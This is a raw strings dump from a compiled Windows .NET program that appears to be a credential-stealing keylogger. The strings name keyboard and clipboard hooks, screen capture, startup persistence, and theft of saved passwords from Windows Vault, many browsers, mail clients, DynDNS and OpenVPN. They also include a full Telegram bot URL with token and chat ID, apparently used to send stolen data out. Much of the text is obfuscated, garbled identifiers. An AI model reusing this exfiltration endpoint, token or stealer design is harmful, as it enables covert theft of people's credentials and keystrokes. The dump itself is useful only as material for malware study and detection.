!This program cannot be run in DOS mode.
`.rsrc
@.reloc
com.apple.Safari
Unable to resolve HTTP prox
1SPS*
KDBM(0
v4.0.30319
#Strings
2 U h r z
(!K!c!
#1#=#H#X#
5!<!)#
KNRfxNE0
HytYTCyH0
9osULX0
22USn0
UkVjGo0
1zlr8bCmu0
eXtJvy0
$$method0x6000100-1
$$method0x6000120-1
$$method0x6000140-1
$$method0x6000121-1
$$method0x6000192-1
$$method0x6000106-1
$$method0x6000116-1
$$method0x6000276-1
$$method0x600011b-1
$$method0x600008d-1
$$method0x600007e-1
HMACSHA1
VT_UI1
lX3TM1
JPSgBV1
lZnGYiX1
IEnumerable`1
ICollection`1
IEnumerator`1
IList`1
CS$<>9__CachedAnonymousMethodDelegate1
F7E6rRmUMj1
get_Item1
cgoSRDIeZp1
ewqvSu1
$$method0x6000100-2
$$method0x6000116-2
$$method0x6000276-2
HMACSHA512
Advapi32
kernel32
Microsoft.Win32
user32
ToUInt32
ReadInt32
ToInt32
Qy9DKHM62
W1juREQucG2
VT_UI2
51WvisXI2
W8YIvluK2
2FW27hKM2
Ut7PVi2R2
K5JhwOG8U2
KeyValuePair`2
Dictionary`2
AaLJGP1lbc2
EYudKj2
get_Item2
a0fm0gGGS43
lLlWNBc83
fWZUC3
e2boT3
Tuple`3
BINIUS9Ca3
sD27b3
rqUlGDVrd3
w8HOzBe3
ofi6Nh3
get_Item3
Cnv41w3
Y8mLWz5Z434
ToUInt64
ReadInt64
ToInt64
hoZBbXILE84
HPfJC4
FcPgKuYD4
VT_UI4
5dUJkamPcT4
oeBPiei4
hN0pal4
JxRamVldr4
O3XfCMcUeB5
2heUv6GC5
wskiw8hMF5
i6VtEdQS5
WVSyi6ibWV5
xvqS3mjoT06
IS_TEXT_UNICODE_ASCII16
IS_TEXT_UNICODE_REVERSE_ASCII16
ToUInt16
ReadInt16
ToInt16
HMACSHA256
FA6D56
kg48ldghA6
Wig0lZoFE6
QG6OzE6
IszyJ8b7SS6
YkhB0gcd6
X8O4Yj6
jCK4y6
BZg1l8y6
EgbqLC7
GRRHzyXC7
hVoqH1YF7
VaultGetItem_WIN7
L1Fr4gRYBS7
IvT6wpqkV7
Q916iL42qg7
3u4xm7
JOC9QlktPn7
G9Wo9NOqys7
4gRiyL9u7
N6uIOwXuZ08
WtzD5AC8
FxCIF8
get_UTF8
VT_UI8
VaultGetItem_WIN8
pJXSN8
u3Sz0VyX8
C0v997n8
u4MQuEt09
ua7sttfe29
TeS8u39
yzXCXyrB9
56Z43CMV9
5ulnV9
KrEM6tZe9
DMLCLeqB9x9
<Module>
tzvM1f2A
LoSchDRkCA
W6TkefbMA
O3P7ulUA
b3nAlA
RLkwY0tA
fFe3yxtA
uzbsmwA
wmQh7ExA
KLwJkIJdpyA
z8cncsXtzA
J8Fc3eM3B
tHj6OAqb58B
BCRYPT_KEY_DATA_BLOB
VT_BLOB
tmqzXB
OLYt8JoCdB
vjSFrgB
m966xB
LY1XTeJcxB
OnedNJ9C
BCRYPT_KEY_DATA_BLOB_MAGIC
twmUm0R9PSC
iPnCcquqnC
ucGixC
LLKHF_EXTENDED
LLKHF_INJECTED
VT_CLSID
get_ID
set_ID
FileHandleID
fileHandleID
lpdwProcessID
processID
get_FormatID
set_FormatID
aeBNSZUibOD
yVXycPD
A41rPD
tvxIL9iaQD
1zc27IJaUD
1WnlFoviVD
BGqacjD
gpQmjtD
3BXRAPu0E
DUPLICATE_CLOSE_SOURCE
BCRYPT_CHAINING_MODE
VT_STORAGE
X7dXqKv9RIE
GrDDr48aIE
INVALID_HANDLE
VT_FILETIME
IS_TEXT_UNICODE_SIGNATURE
IS_TEXT_UNICODE_REVERSE_SIGNATURE
kknfRE
VT_DATE
IS_TEXT_UNICODE_DBCS_LEADBYTE
WPluXrubE
K9cjhLqiE
vyNabbanE
ZB46zE
bRUJOWPXm9F
ovVE2KoEF
xgiHvUxIF
WXL4rg9eOF
h7DJfVQTF
QvagZmntVF
47Jd378uYF
BCRYPT_AUTH_MODE_CHAIN_CALLS_FLAG
8ZCCOpCG
C20cqKG
ZVwTwgotO8H
STATUS_AUTH_TAG_MISMATCH
STATUS_INFO_LENGTH_MISMATCH
IS_TEXT_UNICODE_ODD_LENGTH
BCRYPT_AUTH_TAG_LENGTH
BCRYPT_OBJECT_LENGTH
HPUvXH
Sz2cFZH
ZTLkoAScdH
uM5yk5iH
q03C6jH
2VSiy98EuvH
8ZN7pjGI
get_ASCII
9XN6GxnuKI
w2P3lyynMI
QYlX8rXvNI
54tCUI
Gh9BJEvXI
JcBOUfI
xjnhaGX9niI
rLvdfJoI
hgFhKCehF3J
4zdWHvZShTJ
M7v4ZJ
BJ1riR4uJ
2Ie9DpmxJ
RQGGzJ
qYBd3jo5K
u7td1Fn8K
hNE54FK
UJSp83zHtJK
5TlX7rTKK
WaAvP5ZiPK
IS_TEXT_UNICODE_UNICODE_MASK
IS_TEXT_UNICODE_NOT_UNICODE_MASK
IS_TEXT_UNICODE_REVERSE_MASK
IS_TEXT_UNICODE_NOT_ASCII_MASK
CxsXAYWK
iscGAbdK
gn0NozEnK
tnwvY7foK
WatlnXzoK
T76W9HxK
1uREHSTL3L
t4RF5m3L
DWilP4L
VT_DECIMAL
Ws7m0D3IL
VT_NULL
WH_KEYBOARD_LL
VT_BOOL
rGnSpL
l2nZpL
hjK9SLRnsL
YUWK0M
VT_VERSIONED_STREAM
VT_STREAM
PscKSIAM
BCRYPT_CHAIN_MODE_GCM
XXL9m8hGM
BCRYPT_AES_ALGORITHM
G3c7MM
X9wPSM
icZbSM
XcFRFhTEvTM
KvhwXM
WBqLDZM
m8trJ8UAeeM
sAV2oLkiUgM
GrBU9eajM
26UdWisM
2ygcJwtM
fhqvwM
e2YWZ7yM
gllUDNIeJ2N
0SSqm01HN
BCRYPT_INIT_AUTH_MODE_INFO_VERSION
HC_ACTION
cRdIoTN
LLKHF_ALTDOWN
WM_SYSKEYDOWN
WM_KEYDOWN
XpmbnWN
IrA4XN
fLywebYN
O5ocsN
R1kxyN
WETn2O
jXIXxhaU3O
NaSX4y5O
XOycEO
System.IO
rud8Q8DdLO
hseY0mjjfNO
C2Y3UCTgURO
uRFungO
keB2uXiO
LzNl3P
tsfpa4P
qqTIzZyC6P
BCRYPT_PAD_OAEP
Rus2G4yMeMP
aF0sQP
WM_SYSKEYUP
WM_KEYUP
LLKHF_UP
xXqlHXP
u4IZbq3Q
sukMGXuH5Q
UraeRJjHQ
GK04TQ
FvHsUQ
nbNWWQ
WqZifYQ
W2tadQ
CZNuVAvZfQ
opc4Qf67R
WimDyke77R
vu62AR
MS_PRIMITIVE_PROVIDER
XJU3dJR
VT_ERROR
VT_VECTOR
oM0MRwzarRR
VT_BSTR
VT_LPSTR
VT_LPWSTR
gESq1OeR
zitt3vR
ZErxJlz5XxR
0gfn1ShuSzR
IS_TEXT_UNICODE_STATISTICS
IS_TEXT_UNICODE_REVERSE_STATISTICS
IS_TEXT_UNICODE_NULL_BYTES
C2unueES
IS_TEXT_UNICODE_CONTROLS
IS_TEXT_UNICODE_REVERSE_CONTROLS
lkknWtB8PS
IS_TEXT_UNICODE_ILLEGAL_CHARS
DUPLICATE_SAME_ACCESS
ERROR_SUCCESS
STATUS_SUCCESS
BCRYPT_PAD_PSS
jMb0sXmmS
QdpbByKZECT
DAAW9qJHT
VT_UINT
VT_INT
NcsljU9icT
iArtjEjT
FfDgzPtuT
dYJ9ACAWmAU
KHwlt5wyNU
2OyCv19aU
WT6FmU
RFMVQtU
uU7rNxxU
67s95V
zoGzqIMG8V
e2hCuwDV
get_IV
set_IV
ioAjJjAeV
MLtvHSfV
v22oFYpgmV
FTXQNgJpV
gi4muRTKpV
wnvTnpV
0okK9JW
STATUS_BUFFER_OVERFLOW
YIyyx2FYW
mnwds5QPWgW
XgGLNF4rqW
na9AcIKDxW
koXErp1X
YlAaCpf1EX
6WUfPI5MX
JCV2oERX
JYWaENltPTX
8DI6D8bX
TVZJhiuX
0eRrBCxX
EpC41Y
peV62Y
1ogezpN4Y
VT_ARRAY
uAXEaZvBXDY
ANA8eFY
my2f89bQY
VT_EMPTY
5KhxjhY
5qxO4GJWkY
PYXI1nY
qjj3w7CnpY
WcqIkuuY
47FlLZ
njnlJ6YyWZ
HhgV5ZZ
IXG9mT6iTgZ
T5HVjZ
GkQL1BqASsZ
kCNgluZ
fJGJXK0zZ
value__
TrMxTTE7a
0Vgj3qK7a
ZlEF9a
w7I9LUOIa
w5gmQsQa
t55YEpRta
get_Data
set_Data
cbData
ProtectedData
cbAuthData
pbAuthData
PropertyData
SetQuota
KMhDza
7qicCb
q28L2Db
OpYVYHb
UsoBcrBuMMb
AaQ4wRHLFOb
4d4fcdd0-af09-4cd9-ba08-67491a91d5ab
PublicIpAddressGrab
Unnqcjfxcb
mscorlib
JVLd3Oyag3c
dOUJDFc
PlHXWQsBZFc
N8u0BGc
i8B6ipHc
GAQAAvcsXc
228Ozbc
System.Collections.Generic
Microsoft.VisualBasic
eTMf2pt0ijc
k7xJp3Pojc
ohYFEo0lIlc
WndProc
HookProc
FromFileTimeUtc
yXecwc
HdPieNRIJ3d
5kvLnDd
d0hSWId
get_Id
SchemaId
schemaId
pszAlgId
HookId
GetWindowThreadProcessId
processId
ChatId
SchemaElementId
Z78MRd
Fu2GgnBIWd
PageExecuteRead
OpenRead
FileMapRead
VirtualMemoryRead
CreateThread
lpcbNeeded
DomainExtended
SHA1Managed
RijndaelManaged
add_Changed
remove_Changed
get_LastModified
set_LastModified
_lastModified
Interlocked
set_Enabled
get_IsEnabled
set_IsEnabled
_enabled
Undefined
lpOverlapped
samDesired
add_Elapsed
get_LastAccessed
set_LastAccessed
_lastAccessed
get_Reserved
reserved
System.Collections.Specialized
isG9hufd
TorPid
activeWindowPid
pPackageSid
row_id
get_IsInvalid
get_Guid
vaultGuid
PcHwid
<ID>k__BackingField
<FormatID>k__BackingField
<Data>k__BackingField
<LastModified>k__BackingField
<IsEnabled>k__BackingField
<LastAccessed>k__BackingField
<Password>k__BackingField
<password>k__BackingField
<PropertyStorage>k__BackingField
<Name>k__BackingField
<FileName>k__BackingField
<ApplicationName>k__BackingField
<name>k__BackingField
<Username>k__BackingField
<username>k__BackingField
<Type>k__BackingField
<type>k__BackingField
<secure>k__BackingField
<expirationDate>k__BackingField
<sameSite>k__BackingField
<TypedPropertyValue>k__BackingField
<value>k__BackingField
<Size>k__BackingField
<IsRunning>k__BackingField
<Path>k__BackingField
<path>k__BackingField
<hostmask>k__BackingField
<domain>k__BackingField
<Version>k__BackingField
<Application>k__BackingField
<Description>k__BackingField
<user>k__BackingField
<hoster>k__BackingField
<Tasks>k__BackingField
<objects>k__BackingField
<Accounts>k__BackingField
<Keys>k__BackingField
<Lenght>k__BackingField
<JsonResult>k__BackingField
<Host>k__BackingField
<GuidMasterKey>k__BackingField
<httpOnly>k__BackingField
GetField
796Ckld
TrimEnd
ReadToEnd
AppEnd
Append
get_Millisecond
GetUpperBound
GetLowerBound
set_Method
method
Clipboard
get_Password
set_Password
DomainPassword
get_password
set_password
7XPjRcZGud
L195Be
YuV0MeXOjCe
JzSCuzUHe
13NB6nLe
gHiXbUe
Replace
IsNullOrWhiteSpace
DeleteBackspace
QueryDosDevice
hInstance
IdentityReference
Sequence
cbNonce
pbNonce
Resource
vkCode
wScanCode
scanCode
keyCode
set_Mode
FileMode
ShareMode
PaddingMode
CryptoStreamMode
CipherMode
SelectSingleNode
XmlNode
get_Unicode
get_BigEndianUnicode
IsTextUnicode
FromImage
SectionImage
get_PropertyStorage
set_PropertyStorage
SerializedPropertyStorage
SendMessage
AddRange
CompareExchange
CredentialCache
SectionNoCache
P83mDChke
EndInvoke
BeginInvoke
GetEnvironmentVariable
SetEnvironmentVariable
IEnumerable
IDisposable
ToDouble
get_Handle
RuntimeFieldHandle
hSourceHandle
SafeHandle
GetModuleHandle
RuntimeTypeHandle
ReleaseHandle
CloseHandle
DuplicateHandle
CreateHandle
GetTypeFromHandle
hSourceProcessHandle
hTargetProcessHandle
lpTargetHandle
bInheritHandle
vaultHandle
activeWindowHandle
handle
Rectangle
ToSingle
CreateFile
hTemplateFile
DeleteFile
WriteFile
MoveFile
MapViewOfFile
UnmapViewOfFile
lastTitle
activeWindowTitle
lphModule
get_MainModule
ProcessModule
get_Name
set_Name
lpDeviceName
get_FileName
set_FileName
GetModuleFileName
lpExistingFileName
lpFileName
GetFileName
lpNewFileName
_fileName
get_ModuleName
lpModuleName
lpBaseName
baseName
lpValueName
StartupRegName
rootPathName
get_OSFullName
get_FullName
OperatingSystemName
get_ApplicationName
set_ApplicationName
StartupInstallationName
lpName
lpAppName
get_UserName
get_ComputerName
ThisComputerName
ProcessorName
get_ProcessName
processName
StartupEnvName
GetProcessesByName
lpKeyName
pszCredentialFriendlyName
StartupDirectoryName
GetDirectoryName
astable_name
item_name
get_name
set_name
Filename
filename
get_Username
set_Username
get_username
set_username
DateTime
GetLastAccessTime
dwTime
AppendLine
get_NewLine
Combine
LocalMachine
Escape
Unescape
DataProtectionScope
get_Type
set_Type
pszBlobType
GetFileType
MimeType
ValueType
LogType
SecurityProtocolType
GetType
set_ContentType
item_type
get_type
set_type
FileShare
Compare
System.Core
get_secure
set_secure
PtrToStructure
get_InvariantCulture
Capture
NameObjectCollectionBase
HttpWebResponse
GetResponse
Dispose
Reverse
get_expirationDate
set_expirationDate
X509Certificate
GenericCertificate
DomainCertificate
Create
KBDLLHookProcDelegate
MulticastDelegate
Terminate
PcState
GetKeyboardState
lpKeyState
GetKeyState
Delete
get_sameSite
set_sameSite
PageReadWrite
PageExecuteReadWrite
nNumberOfBytesToWrite
FileMapWrite
VirtualMemoryWrite
Remote
STAThreadAttribute
CompilerGeneratedAttribute
GuidAttribute
SecuritySafeCriticalAttribute
ExtensionAttribute
AssemblyFileVersionAttribute
FlagsAttribute
CompilationRelaxationsAttribute
ReliabilityContractAttribute
ParamArrayAttribute
RuntimeCompatibilityAttribute
SuppressUnmanagedCodeSecurityAttribute
set_UseShellExecute
FileMapExecute
ReadByte
ToByte
get_Value
HandleValue
TryGetValue
get_TypedPropertyValue
set_TypedPropertyValue
GetPropertyValue
get_value
set_value
set_KeepAlive
Remove
SectionReserve
3sgsNVxe
26szxe
get_Size
set_Size
dataSize
cbSize
get_StorageSize
lpFileSize
get_NameSize
volumeNameSize
nFileSystemNameSize
SQLDataTypeSize
get_StoreSize
get_ValueSize
get_HashSize
set_BlockSize
chunkSize
get_KeySize
Serialize
Deserialize
Initialize
Finalize
Synchronize
page_size
Resize
5gVLBzB4f
Qab2pHf
xg1u7yc0Jf
SizeOf
get_ItemOf
LastIndexOf
cchBuff
aNFkWjf
3aEM3GDlf
lastInputInf
pwbuFCg
mr2qKg
DrqQfIIb3Qg
lmIrhbg
get_Jpeg
uPnCzFfg
uPrbHdtlg
L8GJYZmg
System.Threading
get_Padding
set_Padding
UTF8Encoding
encoding
System.Drawing.Imaging
get_IsRunning
set_IsRunning
CreateFileMapping
FromBase64String
ToBase64String
EscapeDataString
UnescapeDataString
lpReturnedString
GetPrivateProfileString
ToString
GetString
OctetString
BitString
Substring
System.Drawing
YMzl2log
FaYeWMFkTpg
get_Msg
x5sL1Qq3h
u0aBQ6h
jrJpWS6h
TxCqc3Pgw6h
TU22kjLgE7h
aOiK8h
XZvmEh
dwMaximumSizeHigh
dwFileOffsetHigh
ZjoN85Dxoh
ComputeHash
get_Path
set_Path
SystemAppdataPath
get_ExecutablePath
AsmFilePath
AppStartupFullPath
GetTempPath
GetFolderPath
lpTargetPath
StartupDirectoryPath
get_path
set_path
get_Width
get_Length
MaximumLength
dwMinLength
SystemInformationLength
ObjectInformationLength
set_MaxJsonLength
ReturnLength
maximumComponentLength
GetWindowTextLength
dwMaxLength
EndsWith
StartsWith
Nvk1BAvh
qzzBPaGDJi
GcFUBnWhaLi
We4qWi
fvJDCnOefgi
PtrToStringUni
StringToHGlobalUni
xDhYUVZni
TelegramApi
MqJMlALSFwi
0OWf1j
33fbVj
3qiyxVj
objrij
wglEqlCrmj
cy8dUhqj
4eq8HZItj
vmCjo9f2k
Kb7HwhoIu4k
U0PEhIaJk
eBdIu4bNRRk
AsyncCallback
RemoteCertificateValidationCallback
get_ServerCertificateValidationCallback
set_ServerCertificateValidationCallback
callback
get_CapsLock
TransformFinalBlock
TransformBlock
idHook
_clipboardHook
_keyboardHook
get_hostmask
set_hostmask
VBTXivxWvk
n7bt7l
8aZlhBl
iUWf93Ql
GBJOQl
AllocHGlobal
FreeHGlobal
Illegal
Marshal
Decimal
System.Security.Principal
set_Interval
ScreenInterval
KeyloggerInterval
Rijndael
cbLabel
pbLabel
System.ComponentModel
EnableTorPanel
Kernel32.dll
kernel32.dll
User32.dll
user32.dll
vaultcli.dll
psapi.dll
ntdll.dll
bcrypt.dll
System.Xml
set_SecurityProtocol
Control
FmIVEODxtl
rOaoHm
xOAsuKm
cHitYUcCCWm
cXo2tXm
FileStream
get_BaseStream
GetResponseStream
CryptoStream
GetRequestStream
MemoryStream
get_LParam
get_WParam
get_Param
lParam
wParam
get_Item
set_Item
VaultGetItem
vaultItem
OperatingSystem
HmacAlgorithm
SymmetricAlgorithm
phAlgorithm
KeyedHashAlgorithm
algorithm
HD8kjm
SVnQB8om
Random
ICryptoTransform
Maximum
root_num
Et70vm
A1QHbU2n
LtHe76n
sQccGHGn
ToBoolean
IsLittleEndian
CopyFromScreen
get_PrimaryScreen
aZDjxhen
lpNumberOfBytesWritten
X509Chain
ChangeClipboardChain
get_domain
set_domain
Extension
get_OSVersion
get_Version
set_Version
dwInfoVersion
get_Application
set_Application
get_Location
ObjectDataInformation
SystemRegistryQuotaInformation
SystemBasicInformation
ObjectBasicInformation
QueryLimitedInformation
SystemPerformanceInformation
SystemProcessorPerformanceInformation
SystemLookasideInformation
SystemHandleInformation
ObjectNameInformation
GetVolumeInformation
ObjectTypeInformation
ObjectAllInformation
NtQuerySystemInformation
SystemExceptionInformation
SystemProcessInformation
ObjectInformation
SetInformation
SystemInterruptInformation
SystemTimeOfDayInformation
QueryInformation
VirtualMemoryOperation
pszImplementation
System.Globalization
System.Web.Script.Serialization
System.Reflection
PropertyDataCollection
NameValueCollection
MatchCollection
GroupCollection
KeysCollection
ManagementObjectCollection
KeyCollection
set_Position
CreationDisposition
SearchOption
Win32Exception
CryptographicException
ArgumentOutOfRangeException
ArgumentException
get_Description
set_Description
get_StatusDescription
_description
System.Runtime.ConstrainedExecution
StringComparison
LFiUBtpn
add_KeyDown
remove_KeyDown
get_CtrlKeyDown
get_ShiftKeyDown
get_AltKeyDown
Unknown
i537ZFjAzn
dhqS5o
LTM73v56o
R37NHCo
3mQkwGxHo
1A0w2AOjHOo
CompareTo
CopyTo
lastInPutNfo
dwExtraInfo
ImageCodecInfo
FieldInfo
FileInfo
CultureInfo
pPaddingInfo
FileSystemInfo
MemberInfo
ComputerInfo
get_StartInfo
ProcessStartInfo
GetLastInputInfo
DirectoryInfo
99yXS3p
up0q8p
b63MU9x8p
wKtGhnw2VHp
4RDJYdLp
add_KeyUp
remove_KeyUp
dwNumberOfBytesToMap
Bitmap
TimeStamp
LocalApp
AppAddStartup
HideFileStartup
wTbElbytup
9BCI5yyU7q
d3tHK9q
WmuMHbyrFq
S75QmviJq
7beF2QMq
EmEd4TYMq
Cd3POq
2SAgLTq
XygYaDUq
785nOkfq
i0at9Bmgq
WAxovobhq
System.Linq
a7tFyH4Mr
8yWj4Nr
OYVSSVr
ToChar
lpChar
DirectorySeparatorChar
ObjectTypeNumber
volumeSerialNumber
StreamReader
TextReader
BinaryReader
SHA1CryptoServiceProvider
MD5CryptoServiceProvider
RNGCryptoServiceProvider
TripleDESCryptoServiceProvider
BCryptCloseAlgorithmProvider
BCryptOpenAlgorithmProvider
IFormatProvider
StringBuilder
SpecialFolder
sender
Encoder
volumeNameBuffer
fileSystemNameBuffer
buffer
ServicePointManager
Integer
EnableClipboardLogger
EnableScreenLogger
_screenLogger
_keyLogger
EnableKeylogger
ManagementObjectSearcher
ObjectIdentifier
SecurityIdentifier
ElapsedEventHandler
LogTimer
ToUpper
CurrentUser
get_user
set_user
EncoderParameter
Object_Pointer
BitConverter
get_hoster
set_hoster
BinaryFormatter
SetClipboardViewer
ToLower
JavaScriptSerializer
DfNyiQmr
get_Major
get_Minor
GetLastWin32Error
GetLastError
Authenticator
IEnumerator
ManagementObjectEnumerator
GetEnumerator
RandomNumberGenerator
.cctor
Monitor
CreateDecryptor
CreateEncryptor
passwordVaultPtr
ReadIntPtr
OJrgzo44ur
SpGi50s
xJtxdMb61s
26yYJFVc48s
c9TERFs
MSoYvJIs
4yeSWfIs
ZzZVMs
Graphics
System.Diagnostics
get_Bounds
Microsoft.VisualBasic.Devices
System.Runtime.InteropServices
System.Runtime.CompilerServices
GetInstances
get_ChildNodes
Matches
EnableCookies
GetDirectories
master_table_entries
get_Properties
ExpandEnvironmentVariables
GetFiles
EnumProcessModules
NumberStyles
GetSubKeyNames
field_names
ReadAllLines
GetProcesses
System.Security.Cryptography.X509Certificates
FlagsAndAttributes
lpFileMappingAttributes
SecurityAttributes
FileBytes
Rfc2898DeriveBytes
ReadAllBytes
BufferBytes
GetBytes
db_bytes
get_Values
GetLogicalDrives
fileSystemFlags
dwFlags
ElapsedEventArgs
get_Ticks
get_Tasks
set_Tasks
ICredentials
set_Credentials
get_DefaultCredentials
Equals
CreateParams
VaultEnumerateItems
System.Windows.Forms
Contains
System.Web.Extensions
System.Text.RegularExpressions
iterations
System.Collections
set_MaximumAutomaticRedirections
StringSplitOptions
RegexOptions
options
65uUnkZos
get_Groups
get_Chars
GetImageEncoders
System.Timers
RuntimeHelpers
EncoderParameters
SslPolicyErrors
SystemInformationClass
ObjectInformationClass
ManagementClass
dwDesiredAccess
GrantedAccess
FileAccess
FileMapAllAccess
processAccess
get_Success
CreateProcess
hProcess
OpenProcess
GetCurrentProcess
lpBaseAddress
PublicIpAddress
get_objects
set_objects
VaultEnumerateVaults
pPropertyElements
set_Arguments
get_Accounts
set_Accounts
get_Exists
SnSN4QWjvs
get_Keys
set_Keys
get_ModifierKeys
kVxfbFt
WVqt3Lt
rLvvCTt
s6BkWtWyVt
Concat
AppendFormat
ImageFormat
Subtract
VT_BLOB_Object
VT_STREAMED_Object
VT_STORED_Object
ManagementBaseObject
hFileMappingObject
hObject
ManagementObject
cbKeyObject
pbKeyObject
NtQueryObject
object
Collect
set_AllowAutoRedirect
flProtect
Unprotect
System.Net
offset
get_Height
get_Lenght
set_Lenght
op_Explicit
SectionCommit
WaitForExit
cbSalt
PzEqlt
VaultOpenVault
get_Default
lpDefault
pcbResult
IAsyncResult
CookieResult
phkResult
get_JsonResult
set_JsonResult
result
UnsignedInt
set_UserAgent
PublicUserAgent
System.Management
pResourceElement
XmlElement
pAuthenticatorElement
pIdentityElement
dwIncrement
sql_statement
Environment
XmlDocument
get_Parent
GetParent
get_Current
content
get_Count
get_HandleCount
get_TickCount
vaultItemCount
set_IterationCount
dwPropertiesCount
vaultCount
ctybKwupt
BCryptDecrypt
BCryptEncrypt
TrimStart
AppStart
Convert
UnsignedShort
HttpWebRequest
XmlNodeList
ToList
MozillaBrowserList
ChromiumBrowserList
get_Host
set_Host
set_Timeout
GetKeyboardLayout
dwLayout
cbInput
pbInput
cbOutput
pbOutput
get_StandardOutput
set_RedirectStandardOutput
7LG8vt
MoveNext
System.Text
LastCopiedText
KeylogText
ReadAllText
AppendAllText
get_InnerText
GetText
GetWindowText
Log_text
cbMacContext
pbMacContext
qZb7o599zt
X6hC3u
VFOPUd8y8u
S3PZ3RGu
ByQtNJu
bz9QwI4Pu
kJdi3Qu
O3q3Qu
xP1eXXu
aRw7UtH1bu
YQ8SMz9KXdu
3sHGMnadu
by1afu
i652me3bju
veIYv1ku
srv3Rskmu
pZBDIc44unu
USP0lqu
NqlvGxSdru
VM8ZCyu
IDaZ0v
vCgD1pW2v
nMyVs5v
Ik63bAc6Ev
mP02yPv
9fnXav
Hj7hMn7gv
zmGGutPUSgv
rN3geb8rv
jINU2v2uv
OvUqy5qOEvv
3tnSjtum3w
m9x4Bw
cOxtUTXfqDw
tNRfGw
dssdOfw
fmWuTikw
Asfxnw
dwMaximumSizeLow
dwFileOffsetLow
get_Now
GetForegroundWindow
NativeWindow
set_CreateNoWindow
rsmUsw
b1x5nHC3x
JOHFl5x
ANEOrwiEG8x
xeLW7C9x
NDUAjxPa9x
40LRf9x
ToUnicodeEx
GetModuleFileNameEx
RegQueryValueEx
GetFileSizeEx
UnhookWindowsHookEx
SetWindowsHookEx
CallNextHookEx
MaximumEx
RegOpenKeyEx
i3UjKx
ZXijTx
ucchMax
OaKxql9ex
BufferEndIndex
BlockIndex
BufferStartIndex
Cu1bdix
Ggq8CtuMztx
uACCK2y
vCXSRW2y
zal086u2y
K6nte4y
ProtectedArray
ToByteArray
InitializeArray
ToArray
ToCharArray
Consistency
get_Key
set_Key
OpenSubKey
subKey
RegCloseKey
get_GuidMasterKey
set_GuidMasterKey
_guidMasterKey
ContainsKey
wVirtKey
hImportKey
BCryptImportKey
BCryptDestroyKey
RegistryKey
_wsftpkey
5uQuazwRfy
System.Security.Cryptography
WZybgiy
m90XiGwjy
GetExecutingAssembly
get_httpOnly
set_httpOnly
PageReadonly
Multiply
PageWriteCopy
BlockCopy
FileMapCopy
System.Runtime.Serialization.Formatters.Binary
AmountOfMemory
get_TotalPhysicalMemory
Directory
Registry
get_Capacity
Quality
op_Equality
op_Inequality
System.Security
System.Net.Security
Identity
IsNullOrEmpty
BCryptSetAlgorithmProperty
BCryptGetProperty
BCryptSetProperty
pszProperty
CqWDhp7z
1suwv0Cz
RJ5nM6Fz
mfOyPz
9ROeJDSZz
sHpnSpf1kz
$8d83bbf2-9283-4fae-869f-2efcf34ef091
WrapNonExceptionThrows
1.0.0.0
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
p p p!p"p#p$p%p&p'p(p)p*p+p,p-p.p/p0p1p2p3p4p5p6p7p8p9p:p;p<p=p>p?p@pApDpEpFpGpHpKpiy
k#n+n9
4 5 6!7"8#9$:%;&<'=(>)?*@+A,B-C0D4E5F6G7H8I9K:N;O=QATDZF[N`PfTxZy^z`{c|g}j
BACAIHJHQPVUWUXUZY_^fehgigjgkglgmgpo
image/jpeg
/log.tmp
text/html
yyyy-MM-dd HH:mm:ss
text/plain
<br>OSFullName:
MM/dd/yyyy HH:mm:ss
<br>CPU:
<br>Computer Name:
<br>User Name:
IP Address:
Time:
<br>RAM:
User Name:
OSFullName:
Recovered!
Time:
https://api.ipify.org
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
https://api.telegram.org/bot6425147879:AAEpFlxG_6XmvkDuW7kxRxokKvKCqeqGDAU/
5680812357
appdata
wUrxPlW
wUrxPlW.exe
]</b> (
{KEYUP}
{ENTER}
{ALT+F4}
{KEYDOWN}
{BACK}
{CTRL}
{PageDown}
{CAPSLOCK}
{KEYLEFT}
control
{NumLock}
{Insert}
{KEYRIGHT}
{PageUp}
{HOME}
{ALT+TAB}
"
<br><hr>Copied Text: <br>
logins
IE/Edge
2F1A6504-0641-44CF-8BB5-3612D865F2E5
Windows Secure Note
3CCD5499-87A8-4B10-A215-608888DD3B55
Windows Web Password Credential
154E23D0-C644-4E6F-8CE6-5069272F999F
Windows Credential Picker Protector
4BF4C442-9B8A-41A0-B380-DD4A704DDB28
Web Credentials
77BC582B-F0A6-4E15-4E80-61736B6F3B29
Windows Credentials
E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
Windows Domain Certificate Credential
3E0E35BE-1B77-43E7-B873-AED901B6275B
Windows Domain Password Credential
3C886FF3-2669-4AA2-A8FB-3F6759A77548
Windows Extended Credential
00000000-0000-0000-0000-000000000000
SchemaId
pResourceElement
pIdentityElement
pPackageSid
pAuthenticatorElement
UC Browser
UCBrowser\
Login Data
journal
wow_logins
Safari for Windows
\Common Files\Apple\Apple Application Support\plutil.exe
\Apple Computer\Preferences\keychain.plist
<string>
</string>
<data>
</data>
<array>
<dict>
-convert xml1 -s -o "
\fixed_keychain.xml"
\Microsoft\Credentials\
\Microsoft\Protect\
credential
QQ Browser
Profile
\Default\EncryptedStorage
\EncryptedStorage
Tencent\QQBrowser\User Data
entries
category
Password
password_value
IncrediMail
PopPassword
SmtpPassword
Software\IncrediMail\Identities\
\Accounts_New
SmtpServer
EmailAddress
Eudora
Software\Qualcomm\Eudora\CommandLine\
current
Settings
SavePasswordText
ReturnAddress
Falkon Browser
\falkon\profiles\
startProfile=([A-z0-9\/\.\"]+)
profiles.ini
\browsedata.db
autofill
ClawsMail
\clawsrc
\Claws-mail
passkey0
master_passphrase_salt=(.+)
master_passphrase_pbkdf2_rounds=(.+)
\accountrc
smtp_server
address
account
\passwordstorerc
{(.*),(.*)}(.*)
Flock Browser
APPDATA
\Flock\Browser\
signons3.txt
DynDns
username=
password=
https://account.dyn.com/
ALLUSERSPROFILE
Dyn\Updater\config.dyndns
t6KzXhCh
Dyn\Updater\daemon.cfg
global
accounts
account.
username
password
Psi/Psi+
\accounts.xml
\Psi+\profiles
\Psi\profiles
OpenVPN
Software\OpenVPN-GUI\configs
Software\OpenVPN-GUI\configs\
auth-data
entropy
remote
